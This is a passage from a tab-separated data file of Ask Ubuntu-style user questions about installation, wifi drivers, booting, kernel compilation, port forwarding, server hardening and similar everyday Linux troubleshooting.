download and burn the correct programs for a live cd so i can test them out . i have read page after page from linux about all these subjects and the more i read the worse it gets . i need a simple how to that i can use for each system , without having to download fifteen different things to do this that or the other thing . i was under the belief that linux was easy to use . that may be once i get it on the computer . its getting there that has confused me . please somebody help .
447023	ubuntu wont run after instalation	im using chromebook c720 and i installed ubuntu but when it restarts/reboots it enters into chrome os and not ubuntu , please help me .
447025	usb port not recognizeing	10 when i plug in my flash drive ubuntu recognizes the drive when i plug in a usb2.0 adapter for speaker it does nothing on windows 7 everything works the drivers were automatically downloaded is there some way to get ubuntu to recognize the usb2.0 speaker adapter
447030	icons without names	i would like the icons of the current programs running not to show their names , like windows 7 . i am running xubuntu 13.10 , and help would be appreciated !
447032	how to reinstall realtek rtl8192ce on ubuntu 13.10 ?	i want to remove the wifi driver from ubuntu , then reinstall it . i know how to install it ( http : //www.youtube.com/watch ? v=qfh2ezhukgs ) , but do n't know how to remove it first . i 'm a novice user , so please provide simple code for the terminal . i want copy and paste , and just have it all work .
447036	no wireless on version 12.04	i am attempting to change from windows xp to ubuntu on my dell inspiron laptop . this is a home-use laptop , and its main us is wireless internet surfing . in following recommendations found online , i have : went to system settings > hardware > additional drivers subsequently told to activate `` broadcom sta wireless driver received error message sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log not knowing how to look at the log file , i googled ubuntu /var/log/jockey.log followed recommendation of `` sorry , installation of this driver failed . please have a look at the log file for details '' received numerous notifications of the removal and/or installation of drivers incomplete when following step 5 from above . still do not have wireless . i appreciate that someone choosing to reply/answer this question might be well versed in coding and technology ... but i am not . if possible , please provide an answer in a manner that a 5-year-old could understand . i appreciate any assistance .
447040	what calendar or alarm program will remind me to take my meds and track them ?	what programs are best at reminding me to take my meds [ and suppliments ] daily ? and , equally important , keep track of them as i check-mark the boxes ( if that method is available ) ?
447043	exclude user from using systemwide installed programs	i recently created a new user . i want to allow this user to use only one or two programs , but i have lots of systemwide installed apps . is there an easy way to exclude a specific user from using apps ( without reinstalling everything again ) ?
447044	graphical github client for ubuntu ?	i am looking for an easy to use , graphical github client for ubuntu , since i do not know how to use git in the terminal ( yet ) . thanks
447050	adding hindi fonts to ubuntu font family	i wish to add more hindi fonts to the ubuntu font library , so that i can use them in libreoffice . the three font types are available on this website in ttf format on this website . http : //www.abhivyakti-hindi.org/abhi/hindi_shusha_fonts_dl_help.htm how do i add them ?
447055	help connecting wirelessly lubuntu 12.04	okay , so you will probably think i 'm crazy , but i had so many problems with windows , i decided to reinstall xp ... fat lotta good that did . so i tried lubuntu , not knowing anything about it or programming . it works pretty well too , but for some reason i ca n't get a wireless connection . i 've read other posts , and get lost in the technical jargon . i do n't even know what a gui master controller utility , or whatever they said , is . `` wireless networks '' is greyed out , as is `` device not ready ( firmware missing ) '' when i put my mouse over the networks icon in my tray . how do i get this thing to connect without being tied to the ethernet cable i am currently using ? details and laymen 's terms , please . this is a dell latitude d600 . beyond that , i could n't give any more detail about the hardware .
447057	`` alias '' es for alt-f2	in the .bashrc file , one can add alias geditm = 'gedit -- display=d1' for example , and then i can run `` geditm '' and have gedit open in display d1 . i am curious if there is a way to give a similar kind of alias for running commands from the alt-f2 menu , so that i could alt-f2 , geditm and have the same result . ( disclaimer -- i am interested in doing this generally , not for gedit ) .
447058	how to fix iso burned from a movie dvd ?	so ... i recently burned a number of dvds to iso files in my computer . while about half seem to work , the other half do n't actually play properly . i have tried this on a few media players . totem/vlc : if the dvd will play , it opens it instantly . if it wo n't play , it will consume ridiculous amounts of ram , eventually load , and eventually not play when i click play . dragon : regardless of whether the dvd will play , it loads the video previews and the dvd menu . when i hit play , however , it wo n't actually play . i reckon that not everything was copied correctly or something . if i mount the dvd , i will be able to play some of the vob files ( at least the ones i tried ... there are a lot of them ) . are there any repair tools for isos burned from movie dvds ? or is the only option to re-burn them ? i used brasero to burn the dvds and do n't recall seeing any errors when i burned them ... i only ask because i do n't have the physical dvds i burned with me at the moment . many thanks !
447062	how to fully encryped ubuntu on the beaglebone black	... or at least access luks partitions from a unencrypted system . in the past my bbb crashed during file copying on encryted sdhc that actually did mount . in the later versions from http : //elinux.org/beagleboardubuntu trying to access a luks encrypted sdhc with my bbb gives me a message the cypher is missing or something like that . i have tryed some modprobe commands , based on something i found in the net , but not got it working . there are kernel modules missing . but all i found on the web was something about a cape for hardware accelerated encryption and i am confused about this . i do not care if its hardware accelerated or just software ( i only know this terms from 3d rendering in games ) . so is it possible to have a `` normal '' ubuntu with all the stuff needed for encryption on my bbb ? if yes did maybe somebody already compiled a kernel and distributes it somewhere ? if not how do i compile my own kernel with the cypher modules and everything needed for luks encryption .
447063	redirect requests to my external ip/port to a internal ip/port ?	i have a dedicated server running kvm virtualization with n public ip addresses dedicated to n-1 web-facing virtual machines . now i 'd like to set up some web-facing vm 's that do n't have a dedicated address , but instead will have 2 or 3 ports forwarded for them from the host machine . bridge configuration is : brctl show let 's say i would like to forward 178.126.193.153:201 to 192.168.1.101:22 178.126.193.153:801 to 192.168.1.101:80 first , i have enabled port forwarding on a host machine by uncommenting # net.ipv4.ip_forward=1 in /etc/sysctl.conf , then i did sysctl -p /etc/sysctl.conf service network restart then , similar to the recipe in this question , i did : iptables -t nat -a prerouting -p tcp -i br0 -- dport 201 -j dnat -- to-destination 192.168.1.101:22 iptables -a forward -p tcp -d 192.168.1.101 -- dport 201 -m state -- state new , established , related -j accept iptables -t nat -a prerouting -p tcp -i br0 -- dport 801 -j dnat -- to-destination 192.168.1.101:80 iptables -a forward -p tcp -d 192.168.1.101 -- dport 801 -m state -- state new , established , related -j accept i ran ifconfig on a guest machine and checked that its interface eth0 , indeed , has the ip address 192.168.1.101 . the interface inside of virtual machine is called eth0 , is this right ? but it does n't work : nmap 178.126.193.153 does n't show an open port 201 nor 801 , and ssh -l root -p 201 178.126.193.153 gets me ssh : connect to host 178.162.193.153 port 201 : connection refused ip route on a host machine returns 178.126.193.128/26 dev br0 proto kernel scope link src 178.162.193.153 192.168.122.0/24 dev virbr0 proto kernel scope link src 192.168.122.1 169.254.0.0/16 dev br0 scope link metric 1004 default via 178.126.193.190 dev br0 what am i doing wrong ?
447078	login , password	i managed to get ubuntu installed on the extra hard drive . but i ca n't log in . it shows my username , then login if i type the username it then takes me to the password . it will not allow me to enter a password . i guess i need to know what information to type in after login , so it will allow me to type in the password i set up . or i need to know how to change my user name , and password . otherwise , i need to know how to remove ubuntu from the hard drive , and format that hard drive . still waiting to have somebody explain to me how to download the live cds and have them boot so that i can try the programs before installing it or them to the extra hard drive .
447080	alternative of ccleaner in ubuntu 13.10	is there any alternative software of ccleaner in ubuntu 13.10 . my laptop is running very slow , and firefox also running slow and unresponsive .
447084	will i have any trouble dual-booting an hp 250 g1	i was considering buying an hp 250 g1 laptop . i 'd like to keep the copy of windows 8.1 that comes installed on it , but dual boot with ubuntu . i 've been given the impression that the uefi might give me trouble and/or that i wont be able to create the appropriate partitions . are any of these foreseeable difficulties ?
447086	how to completely remove lamp server and phpmyadmin	i am a newly used lamp server and phpmyadmin.i was trying to install lamp server and phpmyadmin , but it is not working.so , i want to completely remove lamp server and phpmyadmin . also , give a proper steps to fresh installing of lamp server and phpmyadmin .
447088	how to install openstack with swift ?	how can we install swift in openstack while in devstack there are lots of errors while installing via devstack with enabling swift is there any scripted installation method ? any links ?
447091	difference between qt creator and ubuntu sdk ?	having downloaded them both when i installed the ubuntu sdk , i wonder if there is any tangible difference between the two , such as the libraries being employed .
447093	speed up ubuntu 13.10	since i m new one to ubuntu . when using windows 8 os , there are lot of ways to speed up the system performance . that is why i want to know what are the possible ways for best performance of system . i have dell-latitude|d610 with 1 gb ram and 2 ghz processor . your kind instructions are needed .
447095	no root file system defined error while installing ubuntu 12.04 inside windows using wubi	i am trying to install ubuntu 12.04 inside windows 7 using wubi.exe ( downloaded separately from ubuntu forum to get the option to install inside windows ) . when i restart my machine , ubuntu installer begins by verifying the installation . it fails in the middle giving `` no root file system defined '' . as far as my knowledge goes , when installing inside windows we are not required to choose a file system and all the process are completed by the installer on its own . please let me know if there is any additional step required in this process or if possible how can i remove this error ?
447097	grub not updated as required , what should i do ?	i 'm running a daily build of the ubuntu trusy tahr 14.04 ( 64 bit ) . i recently updated , when it mentioned that one of the updates regards the grub file , which was edited manually . i know why it was edited manually ( i had trouble detecting hdmi sound in the configuration and did as this answer suggested , which worked perfectly ) , so i asked to see a side-by-side comparison , intending to apply the changes manually without removing my custom solution . then i clicked forward , and ... the updates just kept on running . that 's it . now , i 'm not sure what i should do exactly - i tried running the updater again but nothing . i have no way of knowing what were the changes , and i 'm afraid of restarting the computer after the updates because i have no idea what 's missing and what might happen ( if anything ) . any suggestions ? thanks in advance !
447098	not able to hear any sound in my ubuntu 10.04	sir i installed ubuntu 10.04 in my system . i am able to watch videos in that but i am not able to here any sounds . i tried different posts in ubuntu website but they are not working . moreover my friend installed ubuntu using power iso allocating a space of about 13gb . now whats the solution ? which plug in or media player will be help full . any solutions ?
447101	unable to add new netowrk location	so , i 'm new to linux , and ubuntu as well ... i have been freed recently ... i am enjoying ubuntu so much ... until the day i wanted to sync my iphone . i tried with rhythmbox and amarok , did n't work . so i 'm trying sync over wifi by ssh . i got open ssh and sbsettings on my iphone , i can connect to it using terminal and command ' $ 'ssh [ ip adress ] -l root ' $ ' my probleme resides on the nautilus interface ; while i go to files -- > enter location , i ca n't find the port number , ip adress and all that , all i get is a window with the command smb : // and even using the smb , i still cant add the iphone as a network place , i get a message that the connection timed out : o im really in deep trouble and i need some help , i do n't know if i have made myself clear , but i wont hesitate to answer any questions thanks to all
447102	error when compile android kernel	i try to compiler android kernel source code for samsung note 2 my host is ubuntu 13.04 and i use toolchains 4.8 i choice a defconfig from arch/arm/configs when i compile the kernel using make -j4 arch=arm cross_compile=/home/naimk/lab/ndk/toolchains/arm-linux-androideabi-4.8/prebuilt/linux-x86_64/bin/arm-linux-androideabi- i get this error : linux-androideabi- chk include/linux/version.h chk include/generated/utsrelease.h make [ 1 ] : `include/generated/mach-types.h ' is up to date . cc arch/arm/kernel/asm-offsets.s in file included from arch/arm/kernel/asm-offsets.c:16:0 : /home/naimk/lab/note2/kernel/arch/arm/include/asm/cacheflush.h:19:22 : fatal error : mach/smc.h : no such file or directory # include < mach/smc.h > ^ compilation terminated . make [ 1 ] : *** [ arch/arm/kernel/asm-offsets.s ] error 1 make : *** [ prepare0 ] error 2 and for other kernel source like samsung ace gt-s5830i i get this error : hostld scripts/kconfig/conf scripts/kconfig/conf -s arch/arm/kconfig chk include/linux/version.h upd include/linux/version.h chk include/generated/utsrelease.h upd include/generated/utsrelease.h hostcc scripts/genksyms/genksyms.o shipped scripts/genksyms/lex.c cc scripts/mod/empty.o hostcc scripts/selinux/genheaders/genheaders hostcc scripts/kallsyms hostcc scripts/mod/mk_elfconfig mkelf scripts/mod/elfconfig.h hostcc scripts/mod/file2alias.o hostcc scripts/selinux/mdp/mdp hostcc scripts/mod/modpost.o shipped scripts/genksyms/parse.h shipped scripts/genksyms/keywords.c shipped scripts/genksyms/parse.c hostcc scripts/genksyms/lex.o hostcc scripts/conmakehash generating include/generated/mach-types.h cc kernel/bounds.s gen include/generated/bounds.h cc arch/arm/kernel/asm-offsets.s hostcc scripts/mod/sumversion.o hostcc scripts/genksyms/parse.o gen include/generated/asm-offsets.h call scripts/checksyscalls.sh hostld scripts/genksyms/genksyms hostld scripts/mod/modpost chk include/generated/compile.h cc init/do_mounts.o cc init/main.o upd include/generated/compile.h cc init/do_mounts_rd.o hostcc usr/gen_init_cpio in file included from include/linux/nfs_fs.h:41:0 , from init/do_mounts.c:20 : include/linux/pagemap.h : in function 'fault_in_pages_readable ' : include/linux/pagemap.h:415:16 : warning : variable 'c ' set but not used [ -wunused-but-set-variable ] volatile char c ; ^ in file included from include/linux/blkdev.h:12:0 , from init/do_mounts.h:2 , from init/do_mounts_rd.c:12 : include/linux/pagemap.h : in function 'fault_in_pages_readable ' : include/linux/pagemap.h:415:16 : warning : variable 'c ' set but not used [ -wunused-but-set-variable ] volatile char c ; ^ in file included from include/linux/mempolicy.h:70:0 , from init/main.c:51 : include/linux/pagemap.h : in function 'fault_in_pages_readable ' : include/linux/pagemap.h:415:16 : warning : variable 'c ' set but not used [ -wunused-but-set-variable ] volatile char c ; ^ gen usr/initramfs_data.cpio as usr/initramfs_data.o ld usr/built-in.o cc init/do_mounts_initrd.o cc arch/arm/kernel/compat.o cc init/do_mounts_md.o in file included from include/linux/blkdev.h:12:0 , from init/do_mounts.h:2 , from init/do_mounts_initrd.c:11 : include/linux/pagemap.h : in function 'fault_in_pages_readable ' : include/linux/pagemap.h:415:16 : warning : variable 'c ' set but not used [ -wunused-but-set-variable ] volatile char c ; ^ cc init/initramfs.o in file included from include/linux/blkdev.h:12:0 , from init/do_mounts.h:2 , from init/do_mounts_md.c:5 : include/linux/pagemap.h : in function 'fault_in_pages_readable ' : include/linux/pagemap.h:415:16 : warning : variable 'c ' set but not used [ -wunused-but-set-variable ] volatile char c ; ^ cc init/calibrate.o cc arch/arm/kernel/elf.o as arch/arm/kernel/entry-armv.o as arch/arm/kernel/entry-common.o cc arch/arm/kernel/irq.o cc arch/arm/mm/dma-mapping.o cc arch/arm/mm/extable.o cc arch/arm/kernel/process.o cc arch/arm/kernel/ptrace.o arch/arm/mm/dma-mapping.c : in function '__dma_alloc ' : arch/arm/mm/dma-mapping.c:215:25 : warning : array subscript is above array bounds [ -warray-bounds ] pte = consistent_pte [ ++idx ] ; ^ cc init/version.o arch/arm/mm/dma-mapping.c : in function 'dma_free_coherent ' : arch/arm/mm/dma-mapping.c:259:25 : warning : array subscript is above array bounds [ -warray-bounds ] ptep = consistent_pte [ ++idx ] ; ^ ld init/mounts.o ld init/built-in.o cc arch/arm/mm/fault.o cc arch/arm/kernel/return_address.o cc arch/arm/mm/init.o cc arch/arm/kernel/setup.o cc arch/arm/kernel/signal.o cc arch/arm/common/vic.o arch/arm/kernel/signal.c : in function 'restore_sigframe ' : arch/arm/kernel/signal.c:278:30 : warning : variable 'aux ' set but not used [ -wunused-but-set-variable ] struct aux_sigframe __user *aux ; ^ cc arch/arm/common/icst.o cc arch/arm/common/clkdev.o cc arch/arm/mm/iomap.o cc arch/arm/mm/fault-armv.o ld arch/arm/common/built-in.o cc arch/arm/kernel/sys_arm.o cc arch/arm/mach-versatile/core.o in file included from arch/arm/mm/fault-armv.c:18:0 : include/linux/pagemap.h : in function 'fault_in_pages_readable ' : include/linux/pagemap.h:415:16 : warning : variable 'c ' set but not used [ -wunused-but-set-variable ] volatile char c ; ^ cc arch/arm/kernel/stacktrace.o cc arch/arm/mm/flush.o in file included from arch/arm/mm/flush.c:12:0 : include/linux/pagemap.h : in function 'fault_in_pages_readable ' : include/linux/pagemap.h:415:16 : warning : variable 'c ' set but not used [ -wunused-but-set-variable ] volatile char c ; ^ cc arch/arm/mm/ioremap.o cc arch/arm/kernel/time.o cc arch/arm/mm/mmap.o cc arch/arm/kernel/traps.o cc arch/arm/mach-versatile/versatile_pb.o cc arch/arm/mm/pgd.o cc arch/arm/mm/mmu.o cc arch/arm/plat-versatile/clock.o cc arch/arm/mach-versatile/pci.o cc arch/arm/plat-versatile/timer-sp.o /home/naimk/lab/ndk/toolchains/arm-linux-androideabi-4.8/prebuilt/linux-x86_64/bin/arm-linux-androideabi-ld : internal error in relocate_special_relocatable , at /s/ndk-toolchain/src/build/../binutils/binutils-2.23/gold/arm.cc:9901 make [ 1 ] : *** [ arch/arm/kernel/traps.o ] error 1 make : *** [ arch/arm/kernel ] error 2 make : *** waiting for unfinished jobs ... . cc arch/arm/plat-versatile/sched-clock.o cc arch/arm/mm/vmregion.o ld arch/arm/plat-versatile/built-in.o cc arch/arm/mm/proc-syms.o ld arch/arm/mach-versatile/built-in.o cc arch/arm/mm/alignment.o as arch/arm/mm/abort-ev5tj.o as arch/arm/mm/pabort-legacy.o cc arch/arm/mm/copypage-v4wb.o as arch/arm/mm/tlb-v4wbi.o as arch/arm/mm/proc-arm926.o arch/arm/mm/alignment.c : in function 'do_alignment ' : arch/arm/mm/alignment.c:298:15 : warning : 'offset.un ' may be used uninitialized in this function [ -wmaybe-uninitialized ] offset.un = -offset.un ; ^ arch/arm/mm/alignment.c:720:21 : note : 'offset.un ' was declared here union offset_union offset ; ^ ld arch/arm/mm/built-in.o /home/naimk/lab/ndk/toolchains/arm-linux-androideabi-4.8/prebuilt/linux-x86_64/bin/arm-linux-androideabi-ld : internal error in relocate_special_relocatable , at /s/ndk-toolchain/src/build/../binutils/binutils-2.23/gold/arm.cc:9901 make [ 1 ] : *** [ arch/arm/mm/built-in.o ] error 1 make : *** [ arch/arm/mm ] error 2 please if you can help me
447103	when you create user using adduser what happens on the system ?	i see that /home/user folder is created . /etc/passwd file has an entry with non bin/false or bin/nologin shells . /etc/group has user group . /etc/shadow has the password . is there something else going on when adduser happens ? i would like to change ordinary user into a system user . and i 'm trying to understand what is difference between this two , and what is created in each case by system tools .
447105	ubuntu 13.10 and microsoft wireless notebook presenter 8000	i 've tried pairing my mouse microsoft wireless notebook presenter 8000 on my hp pavilion dv9000 laptop but i just ca n't hit `` pair '' button ! ( it is actually a `` continue '' button ) i 've tried this suggestion : getting microsoft bluetooth mouse working with ubuntu 8.10 and also this one : bluetooth mouse not connecting to laptop ? but none seem to fix the issue . in detail : i set my mouse in pairing mode ( light at bottom flashes green and red ) i open up bluetoooth utility and ask it to pair with a new device tool searches for devices it finds microsoft presenter mouse and displays it 's mac address . no matter how long i wait the tool will never display the name of the mouse . just it 's mac address , whereas for other devices seconds after it detects them the mac address is replaced by the device name . the continue button remains greyed out even when i select the mouse on the list of devices to be paired . i can not do anything from that point on . i just have to close the bluetooth program . note that i can connect perfectly well on other devices , and the mouse works flawlessly on windows 8 on the same computer . any suggestions ?
447106	ubuntu touch os for n900 phone + how to install ?	i recently got interested and bought a used n900 , because of the many cool things i heard about it . while trying to install an application through ham , i think i made a mistake and now the phone is 'bootlooping ' ( maybe because of kernel_power ) . as i was reading how to flash the device , i saw ubuntu touch . now instead of reverting back to maemo5 , i wanted to try ubuntu touch as the new main phone os . how to install ubuntu on a bricked phone , using windows 7 . many thanks and please bear with me for being a total noob .
447109	how to set default time for qml datepicker ?	according to the api i should use date property , but with mode : `` hours|minutes '' the picker stays at 00:00 . is it possible somehow ?
447116	compiz reverts to desktop wall	i installed compiz and when i enter compiz -- replace in terminal after switching compiz from desktop wall to desktop cube the cube works and rotates . however , when i exit terminal compiz reverts back to the desktop wall and disabled the desktop cube . when i try to use lillypad or gedit to change the string value from xwfm4 to compiz it will not save the change . i apologize if this has been asked before but if it has any links to resolved questions would be greatly appreciated
447119	perfect forward secrecy in ubuntu 14.04 default installation	does ubuntu 14.04 support and enable perfect forward secrecy ciphers in the default tls configuration of servers such as nginx , dovecot and postfix ? previous versions of ubuntu such as 12.04 did not even the needed ciphers compiled in ( see lp # 1197884 or how to enable tls 1.2 in ubuntu 12.04 server ? ) .
447122	why is this command starting endless terminals and how to make it work ?	# ! /bin/bash gnome-terminal -- command='/home/user23/bin/n-youtube-dl `` $ 1 '' ' i want to pass the argument passed to this script to the other script started in the terminal . but this starts endless gnome terminals . can you explain why that is and how to make this work ? i am running zsh has my main shell if that matters , the terminal starts the script in zsh then i guess . update : # ! /bin/bash gnome-terminal -- command='echo `` wtf '' ' read -p `` press [ enter ] key '' is just closing the term faster then i can see wtf . is n't it supposed to stop ? same goes for replacing the wtf with $ 1 again , no respawn .
447129	how to list all the packages which are installed from ppas ?	i installed many packages from many ppas on my system . i want to list all the installed packages which are installed from launchpad ppas , not repositories . is this possible through command-line ?
447131	unable to mount location & my existing os windows 8 can not boot	when i try to access one drive , named os from computer it display the below error : unable to mount location error mounting : mount exited with exit code 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda2 ' : operation not permitted the ntfs partition is hibernated . please resume and shutdown windows properly , or mount the volume read-only with the 'ro ' mount option , or mount the volume read-write with the 'remove_hiberfile ' mount option . for example type on the command line : 'mount -t ntfs-3g -o remove_hiberfile/dev/sda2/media/os ' when i try the above command mount -t ntfs-3g -o remove_hiberfile/dev/sda2/media/os it ask for password , but anything can not type . after installing ubuntu 12.04lts alongside windows 8 with .iso image file through usb , my existing os windows 8 can not start . so please give me proper solution for it , or suggest any way to uninstall ubuntu 12.04 with the help of usb ( i installed iso file with usb.i 've not cd and my other os windows 8 also can not start , without the loss of any data from hard disk .
447134	my wifi is not working on 13.10	my laptop specs are : intel corporation pro/wireless 3945abg [ golan ] network connection processor : intel core 2 cpu t5600 @ 1.83ghzx2 graphics : intel 945gmx86/mmx/sse2 memory : 2.0 gig os type : 32-bit how do i resolved the issue -- > wifi is disabled by hardware switch any help would be highly appreciated and thank you !
447139	how can i install lubuntu on a msata ssd	i have an intel nuc d54250wyk with an msata . i can install lubuntu on it , but it will not boot up into the os . i 've tried all of the so-called workarounds , but most of them are for ubuntu . i really like the interface for lubuntu , has anyone found a way to get it to boot right into the os ? if so i would like an easy step-by-step . thanks in advance !
447143	how can i costumize lightdm theme ?	after i upgraded to 13.10 an ugly white icon theme appeared at top panel of lightdm , which does not fit bluish theme . i am using zorin greeter . i also tried gtk greeter but i did n't like it . i took a pic of current lightdm theme using lightdm -- test-mode above picture does n't reflect actual appearance , icons full of white corners . how can i replace my own icon sets with above icons ? edit : there is also no power button option at top right bar . did latest lightdm drop some features ?
447144	basic security tools and packages that should be installed on a public facing web server	i 'm a newbie in this world and i do not have a lot of knowledge about how security works on linux systems . i recently created a droplet on digitalocean with ubuntu 13 and i 've been setting it up by following some of the tutorials they have . but i can see that there are a lot of security tools that do mostly the same thing , so i am unsure what i should install and configure . so far this is what i installed : disallow root access ssh 2 factor authentication ufw fail2ban tripwire denyhosts is this too much or maybe overreacting ? and are any of the above unnecessary ? does anyone suggest some other tools besides the above that i should install ? edit : i ended up installing/setting up the following : 2 factor authentication ( authy ) ufw ( firewall ) fstab ( secure shared memory ) [ step 2 ] disallow root access [ step 3 ] protect su [ step 4 ] sysctl settings ( harden network ) [ step 5 ] ip spoofing [ step 7 ] denyhosts ( prevent brute force attacks ) fail2ban ( protect ssh ) psad ( network intrusion detection ) tripwire ( server intrusion detection ) rkhunter ( rootkit guard ) apparmor ( selinux ) [ step 17 ] i hope that now i got a basic security setup running . any input on what i am missing or what i should not use is appreciated .
447147	unwise to install kde applications in xubuntu ?	i have been doing a bit of reading . it seems most people believe it is unwise to install kde applications in xubuntu , but nobody really explains why it is unwise . can someone please explain this to me ?
447149	mount point for google nexus 7 2013	i am able to connect my google nexus 7 2013 version to my ubuntu machine . ubuntu 12.10 . i had downloaded some content to a subdirectory in the /sdcard/download folder on nexus7 . i am able to see the /sdcard/download folder in my nautilus window on this device but not the subdirectory . ! ! ! i can not find where this device has been mounted on ubuntu . it is not in /media and i can not guess where else to look . $ mount command produces no signs of this device being mounted . surely it is mounted because i am able to browse and copy files from this device through nautilus . lsusb produces a line marked google inc . bus 003 device 003 : id 18d1:4ee1 google inc hovering on the device in nautilus produces the following hovering label mtp : // [ usb:003,003 ] / any advice will be gratefully accepted . regards vidyadhara buddhiraju
447150	create , write and save file from a shell script	i do n't want to write the file manually , so i made a shell-script . is there a way to write & save the file automatically without getting the user to press keys ? sudo nano blah # write stuff to file # save file # continue ^ this will be inside a *.sh file or is there another way to create a simple text file in a script ?
447151	installation of libjack0 package requests removal of skype	musescore requires libjack0 when i compile it . libjack0 requires the removal of skype and other programs ( for example bitwig-studio ) which rely on it . is there a way to have both packages installed ?
447152	nemo '/home ' folder freezes	i have ubuntu 13.10 saucy , and i just installed cinnamon 2.0 desktop . when i try to open files /home is not responding and freezes . i can access specific folders like ~/picture and ~/music from 'search ' and 'menu ' and it responds , but only the /home folder freezes . i also get a pop up message : home is not responding : `` force quit '' or `` wait '' . please help ! !
447157	different problems with my 13.10 system	hello guys , i 'm a real newbie in using ubuntu , but i really , really like it . i 'm facing 2 different and annoying problems tough , so i hope you guys can help me out with this . first problem : i have an issue with booting speed of ubuntu . when i installed the system it was quite fast and good , so i think i messed it up with some installation or something like that . anyways , i attached my dmesg output . my second problem : is that i ca n't change the brightness of my system . the button works , but it wo n't show any effects . ( i have a packard-bell easynote tk87 laptop ) i tried to look for solutions , but could n't find anything helpful at all . thanks for reading this ! best wishes : adam g. dmesg output : http : //pastebin.com/zlrzatru
447169	repairing ubuntu 13.10	i had installed ubuntu 12.04 lts alongside windows 7 . i upgraded to 12.10 successfully using the update manager . when upgrading to 13.10 however , i had to shutdown in between because i was getting too late . it had done the upgrade half . now i am unable to repair it . also , there are no programs/applications appearing in dash home .
447173	wireless faulty in ubuntu 13.10	wireless faulty after installing ubuntu 13.10 i have installed ubuntu 13.10 in my laptop , but since that i cant connect to internet via wireless since i am new to ubuntu please let me know what are the possible reasons that my wireless connection is not working .
447176	when starting up , ubuntu shows only a blinking cursor . why ?	i 've seen this asked multiple times here on askubuntu , but there are so many solutions and so diverse , that i do n't know which one to try . i 'm afraid i 'll break something because i 'm not very experienced with ubuntu or linux in general . if someone could point me to the correct solution , it would be awesome . a bit of context : i had windows 7 already installed on my pc i installed ubuntu 13.10 alongside windows , in dual-boot ( not with wubi ) after this , everything was fine , ubuntu worked with no problems for about 2 - 3 months but , when going into windows , the checkdisk screen always appeared for some reason and i always skipped it one time , a few days ago , i accidentally let checkdisk do its thing after this , booting into windows works fine . but booting into ubuntu does n't . i see the ubuntu logo for 2 seconds and then the screen turns blank with only a blinking cursor in the top left . ps : i did n't apply any updates in ubuntu . from what i remember , i actually turned them off . so this should n't be the cause . like i said in the beggining : i do n't want to try a ton of possible solutions and end up messing the whole boot mechanism and lose access to windows as well . based on the course of events mentioned in the bullet list , which solution should i try ? should i : try changing quiet splash to no splash in grub like mentioned here ? try finding and running some repair commands from the livecd ? ( i still have the dvd , thankfully ) try running bootrepair ? edit : the /var/log/boot.log file looks like this : * starting mdns/dns-sd daemon [ 74g [ ok ] * starting bluetooth daemon [ 74g [ ok ] * starting configure network device [ 74g [ ok ] * starting uncomplicated firewall [ 74g [ ok ] * starting configure network device security [ 74g [ ok ] * starting bridge file events into upstart [ 74g [ ok ] * starting configure network device security [ 74g [ ok ] * starting mount network filesystems [ 74g [ ok ] * starting failsafe boot delay [ 74g [ ok ] * stopping mount network filesystems [ 74g [ ok ] * stopping failsafe boot delay [ 74g [ ok ] * starting system v initialisation compatibility [ 74g [ ok ] * starting modem connection manager [ 74g [ ok ] * starting configure network device security [ 74g [ ok ] * starting configure network device [ 74g [ ok ] * starting network connection manager [ 74g [ ok ] * starting cups printing spooler/server [ 74g [ ok ] * starting userspace bootsplash [ 74g [ ok ] skipping profile in /etc/apparmor.d/disable : usr.bin.firefox * starting cups-browsed - bonjour remote printer browsing daemon [ 74g [ ok ] * starting send an event to indicate plymouth is up [ 74g [ ok ] * stopping userspace bootsplash [ 74g [ ok ] * starting bridge socket events into upstart [ 74g [ ok ] skipping profile in /etc/apparmor.d/disable : usr.sbin.rsyslogd * starting apparmor profiles [ 210g [ 204g [ ok ] * setting up x socket directories ... [ 210g [ 204g [ ok ] speech-dispatcher disabled ; edit /etc/default/speech-dispatcher saned disabled ; edit /etc/default/saned * restoring resolver state ... [ 210g [ 204g [ ok ] * stopping system v initialisation compatibility [ 74g [ ok ] * starting system v runlevel compatibility [ 74g [ ok ] * starting [ 74g [ ok ] * starting automatic crash report generation [ 74g [ ok ] * starting [ 74g [ ok ] * starting regular background program processing daemon [ 74g [ ok ] * starting acpi daemon [ 74g [ ok ] * starting anac ( h ) ronistic cron [ 74g [ ok ] * starting [ 74g [ ok ] * starting [ 74g [ ok ] * starting save kernel messages [ 74g [ ok ] * starting [ 74g [ ok ] * starting [ 74g [ ok ] * starting crash report submission daemon [ 74g [ ok ] * starting cpu interrupts balancing daemon [ 74g [ ok ] * stopping system v runlevel compatibility [ 74g [ ok ] * stopping save kernel messages [ 74g [ ok ] it does n't really say much ...
447177	remove suid/guid bits	suid and sgid files on system are a potential security risk , and should be monitored closely . is there any file in ubuntu server that recommended to remove suid/guid bits from it ?
447178	installing non-pae ubuntu from usb-stick without network	there ! i have to install ubuntu on my old laptop ( ibm thinkpad t42 ) . when i was trying to install normal desktop version , it said that you must have non-pae kernel version . after that i downloaded mini.iso , which has non-pae kernel , and made another usb stick for installation . but this installation needs internet connection . i have only usb wlan stick in my thinkpad and it does not recognize that wlan stick . is there any way to make usb stick that includes non-pae kernel version and most important packages ? or is there any different ways to solve this problem ? thanks , ralf
447180	how to make partitions before installation ?	my laptop is having 320gb hard disk . i want partition it with 195 gb as one part ( here i want install os ) , 4gb for swap 70gb as one partition , 50 gb as one parttiion . i 'm new to do this partition setup . can anyone please tell me how to do it simply and give me step by step procedure ?
447189	what is ubuntu ?	i do n't have a problem . i want to learn about ubuntu . what is ubuntu ? please tell me what documents to read to learn the basics about ubuntu . please point me in the right direction . can someone do that for me , please ?
447190	archfs : backup does mount , but files are not accessible	archfs is a tool that lets one mount a rdiff-backup as a drive , and then browse the contents of the backup as if they were snapshots ( think if backintime or rsnapshot ) . rdiff-backup is a great tool made even greater by archfs . if it would only work ... what i did : create a folder on my desktop , called `` backup '' attach my usb drive containing the rdiff backup , then : archfs '/home/david/desktop/backup ' '/media/david/backup/home' /home/david/desktop/backup contains these folders , david and rdiff-backup-data . i backup my home directory there . ) when i click on the backup folder to open it , an error occurs : '' sorry , could not display all the contents of âbackupâ : transport endpoint is not connected '' what should i do ? -- david
447191	cryptolocker virus	as you guys know cryptolocker is a trojan which targets computers running microsoft windows and destroys files but.. is cryptolocker still a threat and can it infect my files in ubuntu ?
